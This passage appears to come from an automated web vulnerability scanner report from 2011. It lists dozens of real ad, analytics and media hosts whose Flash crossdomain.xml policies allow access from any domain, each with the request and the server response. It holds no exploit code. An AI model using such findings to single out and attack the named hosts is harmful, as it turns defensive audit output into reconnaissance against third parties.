Date: Fri, 06 May 2011 19:31:59 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Sat, 07 May 2011 00:31:59 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>
6.14. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web102
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sat, 07 May 2011 01:57:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...
6.15. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: image/gif
Date: Sat, 07 May 2011 01:22:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
6.16. http://cu1.activalive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cu1.activalive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cu1.activalive.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 272

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-control
...[SNIP]...
6.17. http://d.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
6.18. http://depot.activalive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: depot.activalive.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 26 Apr 2010 17:55:31 GMT
ETag: "1a40b74-98-485277b9dcac0"
Accept-Ranges: bytes
Content-Length: 152
Connection: close
Content-Type: text/xml

<cross-domain-policy><allow-access-from domain="www.activalive.com" to-ports="*" /><allow-access-from domain="*" to-ports="80" /></cross-domain-policy>
6.19. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 06 May 2011 02:37:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 71756
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.20. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:03 GMT
Server: Omniture DC/2.0.0
xserver: www260
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
6.21. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 21:06:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
6.22. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:15 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
6.23. http://img.widgets.video.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "0514ecae5f2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 170
Age: 83571
Date: Fri, 06 May 2011 19:30:36 GMT
Last-Modified: Mon, 04 Apr 2011 16:31:46 GMT
Expires: Fri, 06 May 2011 20:17:45 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
6.24. http://int.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1302740221000"
Last-Modified: Thu, 14 Apr 2011 00:17:01 GMT
Content-Type: application/xml
Content-Length: 373
Date: Sat, 07 May 2011 01:50:38 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
6.25. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 20:02:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
6.26. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:38 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19936
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
6.27. http://nba.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nba.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nba.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://nba.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:10e3"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:30:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
6.28. http://ne.wac.edgecastcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ne.wac.edgecastcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ne.wac.edgecastcdn.net

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 07 May 2011 01:21:59 GMT
Last-Modified: Tue, 08 Mar 2011 05:43:20 GMT
Server: ECS (dca/532A)
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-polic
...[SNIP]...
6.29. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:04 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
6.30. http://om.expedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.expedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.expedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:41 GMT
Server: Omniture DC/2.0.0
xserver: www170
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
6.31. http://p.addthis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 07 May 2011 01:17:47 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
6.32. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Fri, 06 May 2011 22:33:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.33. http://rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 19:30:47 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
6.34. http://recruiting.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: recruiting.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://recruiting.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:c34"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:41:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
6.35. http://scouthoops.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: scouthoops.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://scouthoops.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:68c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Date: Fri, 06 May 2011 19:30:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
6.36. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:27 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:15 GMT
Cache-Control: max-age=1800
Expires: Sat, 07 May 2011 02:12:14 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 1396483138 1396421936
Age: 493
Via: 1.1 varnish
X-Cache-Svr: smf1-acz-03-sr1.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 1
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
6.37. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:40 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 01:50:40 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
6.38. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 06 May 2011 19:11:33 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
6.39. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sat, 14 May 2011 11:02:59 GMT
Date: Sat, 07 May 2011 11:30:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
6.40. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:16 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "a30498-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...
6.41. http://tours.sapha.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tours.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 31 Oct 2008 21:10:10 GMT
ETag: "d3080a5-140-5bff080"
Accept-Ranges: bytes
Content-Length: 320
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
6.42. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 07 May 2011 01:20:11 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
6.43. http://www.scout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:10e3"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:29:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
6.44. http://www2.sesamestats.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.sesamestats.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.sesamestats.com

Response

HTTP/1.0 200 OK
Pragma: "No-Cache"
Content-Length: 268
Content-Type: text/xml
Last-Modified: Fri, 12 Sep 2008 17:47:54 GMT
Accept-Ranges: bytes
ETag: "3a3269afff14c91:6cc"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP CURa ADMa DEVa TAIa PSAa IVAi OUR BUS IND UNI COM NAV"
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 22:33:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
6.45. http://edge.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

